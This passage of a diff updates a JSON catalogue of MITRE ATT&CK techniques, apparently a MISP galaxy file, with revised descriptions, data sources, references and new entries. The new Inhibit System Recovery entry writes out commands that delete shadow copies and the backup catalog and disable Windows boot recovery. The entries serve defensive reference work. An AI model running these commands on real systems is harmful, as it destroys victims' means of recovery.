HTTPflood)\n\n#### SSL Renegotiation Attack\nSSL Renegotiation Attacks take advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)\n\n### Application Exhaustion Flood\nWeb applications that sit on top of web server stacks can be targeted for DoS. Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)\n\n### Application or System Exploitation\nSoftware vulnerabilities exist that when exploited can cause an application or system to crash and deny availability to users.(Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.", + "meta": { + "external_id": "CAPEC-125", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "SSL/TLS inspection", + "Web logs", + "Web application firewall logs", + "Network intrusion detection system", + "Network protocol analysis", + "Network device logs", + "Netflow/Enclave netflow" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1499", + "https://capec.mitre.org/data/definitions/227.html", + "https://capec.mitre.org/data/definitions/131.html", + "https://capec.mitre.org/data/definitions/130.html", + "https://capec.mitre.org/data/definitions/125.html", + "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html", + "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf", + "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged", + "https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/", + "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf", + "https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/", + "https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html", + "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/", + "https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new", + "https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html", + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + ] + }, + "uuid": "c675646d-e204-4aa8-978d-e3d6d65885c4", + "value": "Endpoint Denial of Service - T1499" + }, { "description": "This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.\n\nA technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)", "meta": { @@ -3886,7 +4026,7 @@ "value": "Push-notification client-side exploit - T1373" }, { - "description": "The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL) (Citation: NVD CVE-2016-6662), standard services (like SMB (Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. (Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).\n\nFor websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities. (Citation: OWASP Top 10)", + "description": "The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL) (Citation: NVD CVE-2016-6662), standard services (like SMB (Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. (Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities. (Citation: OWASP Top 10) (Citation: CWE top 25)", "meta": { "external_id": "T1190", "kill_chain": [ @@ -3908,7 +4048,8 @@ "https://nvd.nist.gov/vuln/detail/CVE-2016-6662", "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/", "https://nvd.nist.gov/vuln/detail/CVE-2014-7169", - "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" + "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project", + "https://cwe.mitre.org/top25/index.html" ] }, "uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", @@ -4096,7 +4237,7 @@ "value": "System Owner/User Discovery - T1033" }, { - "description": "An adversary could use knowledge of the techniques used by security software to evade detection. For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection as described by Rastogi et al. (Citation: Rastogi).\n\nBrodie (Citation: Brodie) describes limitations of jailbreak/root detection mechanisms.\n\nTan (Citation: Tan) describes his experience defeating the jailbreak detection used by the iOS version of Good for Enterprise.", + "description": "An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).", "meta": { "external_id": "EMM-5", "kill_chain": [ @@ -4109,9 +4250,9 @@ "refs": [ "https://attack.mitre.org/techniques/T1408", "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html", - "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf", "https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf", - "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions" + "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions", + "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf" ] }, "uuid": "b332a960-3c04-495a-827f-f17a5daed3a6", @@ -4285,6 +4426,32 @@ "uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "value": "Modify System Partition - T1400" }, + { + "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)\n", + "meta": { + "external_id": "T1500", + "kill_chain": [ + "mitre-attack:defense-evasion" + ], + "mitre_data_sources": [ + "Process command-line parameters", + "Process monitoring", + "File monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1500", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/" + ] + }, + "uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925", + "value": "Compile After Delivery - T1500" + }, { "description": "Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.", "meta": { @@ -4597,7 +4764,7 @@ "value": "Credentials in Files - T1081" }, { - "description": "Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. \n\n### Windows\n\nExamples of tools and commands that acquire this information include \"ping\" or \"net view\" using [Net](https://attack.mitre.org/software/S0039).\n\n### Mac\n\nSpecific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as \"ping\" and others can be used to gather information about remote systems.\n\n### Linux\n\nUtilities such as \"ping\" and others can be used to gather information about remote systems.", + "description": "Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. \n\n### Windows\n\nExamples of tools and commands that acquire this information include \"ping\" or \"net view\" using [Net](https://attack.mitre.org/software/S0039). The contents of the C:\\Windows\\System32\\Drivers\\etc\\hosts file can be viewed to gain insight into the existing hostname to IP mappings on the system.\n\n### Mac\n\nSpecific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as \"ping\" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.\n\n### Linux\n\nUtilities such as \"ping\" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.", "meta": { "external_id": "T1018", "kill_chain": [ @@ -4622,13 +4789,14 @@ "value": "Remote System Discovery - T1018" }, { - "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106).", + "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", "meta": { "external_id": "T1202", "kill_chain": [ "mitre-attack:defense-evasion" ], "mitre_data_sources": [ + "File monitoring", "Process monitoring", "Process command-line parameters", "Windows event logs" @@ -4842,7 +5010,7 @@ "value": "Private whois services - T1305" }, { - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. These checks may be built into early-stage remote access tools.\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.", "meta": { "external_id": "T1063", "kill_chain": [ @@ -4973,6 +5141,34 @@ "uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "value": "Windows Management Instrumentation - T1047" }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no", + "meta": { + "external_id": "T1490", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Windows Registry", + "Services", + "Windows event logs", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1490", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + ] + }, + "uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "value": "Inhibit System Recovery - T1490" + }, { "description": "Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.", "meta": { @@ -5065,15 +5261,15 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1096", - "http://msdn.microsoft.com/en-us/library/aa364404", - "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html", - "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/", "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea", - "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/", - "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore", "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/", + "http://msdn.microsoft.com/en-us/library/aa364404", + "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/", + "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/", + "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html", "https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/" + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore" ] }, "uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", @@ -5187,7 +5383,7 @@ "value": "Disabling Security Tools - T1089" }, { - "description": "User Interface Spoofing can be used to trick users into providing sensitive information, such as account credentials, bank account information, or Personally Identifiable Information (PII) to an unintended entity.\n\nAt least three methods exist to perform User Interface Spoofing:\n\nFirst, on both Android and iOS, an adversary could impersonate the user interface of a legitimate app or device function to trick a user into entering sensitive information. The constrained display size of mobile devices (compared to traditional PC displays) may impair the ability to provide the user with contextual information (for example, displaying a full web site address) that may alert the user to a potential issue. (Citation: Felt-PhishingOnMobileDevices) As described by PRE-ATT&CK ([Spearphishing for information](https://attack.mitre.org/techniques/T1397)), it is also possible for an adversary to carry out this form of the technique without a direct adversary presence on the mobile devices, e.g. through a spoofed web page.\n\nSecond, on both Android and iOS, a malicious app could impersonate the identity of another app (e.g. use the same app name and/or icon) and somehow get installed on the device (e.g. using [Deliver Malicious App via Authorized App Store](https://attack.mitre.org/techniques/T1475) or [Deliver Malicious App via Other Means](https://attack.mitre.org/techniques/T1476). The malicious app could then prompt the user for sensitive information. (Citation: eset-finance)\n\nThird, on older versions of Android, a malicious app could abuse mobile operating system features to interfere with a running legitimate app. (Citation: Felt-PhishingOnMobileDevices) (Citation: Hassell-ExploitingAndroid) However, this technique appears to have been addressed starting in Android 5.0 with the deprecation of the Android's ActivityManager.getRunningTasks method and modification of its behavior (Citation: Android-getRunningTasks) and further addressed in Android 5.1.1 (Citation: StackOverflow-getRunningAppProcesses) to prevent a malicious app from determining what app is currently in the foreground.", + "description": "User Interface Spoofing can be used to trick users into providing sensitive information, such as account credentials, bank account information, or Personally Identifiable Information (PII) to an unintended entity.\n\n### Impersonate User Interface of Legitimate App or Device Function\n\nOn both Android and iOS, an adversary could impersonate the user interface of a legitimate app or device function to trick a user into entering sensitive information. The constrained display size of mobile devices (compared to traditional PC displays) may impair the ability to provide the user with contextual information (for example, displaying a full web site address) that may alert the user to a potential issue. (Citation: Felt-PhishingOnMobileDevices) As described by PRE-ATT&CK ([Spearphishing for Information](https://attack.mitre.org/techniques/T1397)), it is also possible for an adversary to carry out this form of the technique without a direct adversary presence on the mobile devices, e.g. through a spoofed web page.\n\n### Impersonate Identity of Legitimate App\n\nOn both Android and iOS, a malicious app could impersonate the identity of another app (e.g. use the same app name and/or icon) and somehow get installed on the device (e.g. using [Deliver Malicious App via Authorized App Store](https://attack.mitre.org/techniques/T1475) or [Deliver Malicious App via Other Means](https://attack.mitre.org/techniques/T1476)). The malicious app could then prompt the user for sensitive information. (Citation: eset-finance)\n\n### Abuse OS Features to Interfere with Legitimate App\n\nOn older versions of Android, a malicious app could abuse mobile operating system features to interfere with a running legitimate app. (Citation: Felt-PhishingOnMobileDevices) (Citation: Hassell-ExploitingAndroid) However, this technique appears to have been addressed starting in Android 5.0 with the deprecation of the Android's ActivityManager.getRunningTasks method and modification of its behavior (Citation: Android-getRunningTasks) and further addressed in Android 5.1.1 (Citation: StackOverflow-getRunningAppProcesses) to prevent a malicious app from determining what app is currently in the foreground.", "meta": { "external_id": "APP-31", "kill_chain": [ @@ -5201,9 +5397,9 @@ "https://attack.mitre.org/techniques/T1411", "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf", + "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/", "https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29", - "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag", - "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/" + "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag" ] }, "uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", @@ -5437,11 +5633,12 @@ "value": "Remote Access Tools - T1219" }, { - "description": "Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028) can also be used externally.\n\nAdversaries may use remote services to access and persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.", + "description": "Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028) can also be used externally.\n\nAdversaries may use remote services to initially access and/or persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [Redundant Access](https://attack.mitre.org/techniques/T1108) during an operation.", "meta": { "external_id": "T1133", "kill_chain": [ - "mitre-attack:persistence" + "mitre-attack:persistence", + "mitre-attack:initial-access" ], "mitre_data_sources": [ "Authentication logs" @@ -5531,7 +5728,7 @@ "value": "Network Share Discovery - T1135" }, { - "description": "Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.\n\n### Office Template Macros\n\nMicrosoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. (Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)\n\nWord Normal.dotm location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.\n\n### Office Test\n\nA Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n\n### Add-ins\n\nOffice add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)\n\nAdd-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins. (Citation: MRWLabs Office Persistence Add-ins)", + "description": "Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.\n\n### Office Template Macros\n\nMicrosoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. (Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)\n\nWord Normal.dotm location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.\n\n### Office Test\n\nA Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n\n### Add-ins\n\nOffice add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)\n\nAdd-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\n### Outlook Rules, Forms, and Home Page\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) \n\nOutlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOutlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOutlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nTo abuse these features, an adversary requires prior access to the user’s Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)", "meta": { "external_id": "T1137", "kill_chain": [ @@ -5554,7 +5751,16 @@ "http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/", "http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/", "https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460", - "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/" + "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf", + "https://github.com/sensepost/ruler", + "https://silentbreaksecurity.com/malicious-outlook-rules/", + "https://sensepost.com/blog/2017/outlook-forms-and-shells/", + "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/", + "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746", + "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943", + "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack", + "https://github.com/sensepost/notruler" ] }, "uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", @@ -5579,14 +5785,14 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1173", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/", + "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021", "https://technet.microsoft.com/library/security/4053440", - "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/", - "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/", "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/", "https://www.contextis.com/blog/comma-separated-vulnerabilities", - "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/", "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee", - "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021" + "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/", + "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/" ] }, "uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", @@ -5627,7 +5833,7 @@ "value": "Capture Clipboard Data - T1414" }, { - "description": "An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account (Citation: NYGov-Simswap) (Citation: Motherboard-Simswap2). The adversary could then obtain SMS messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap). \n\nOne use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account (Citation: Guardian-Simswap) (Citation: Motherboard-Simswap1).", + "description": "An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account (Citation: NYGov-Simswap) (Citation: Motherboard-Simswap2). The adversary could then obtain SMS messages or hijack phone calls intended for someone else (Citation: Betanews-Simswap). \n\nOne use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account (Citation: Guardian-Simswap) (Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap).", "meta": { "external_id": "STA-22", "kill_chain": [ @@ -5641,17 +5847,19 @@ "https://attack.mitre.org/techniques/T1451", 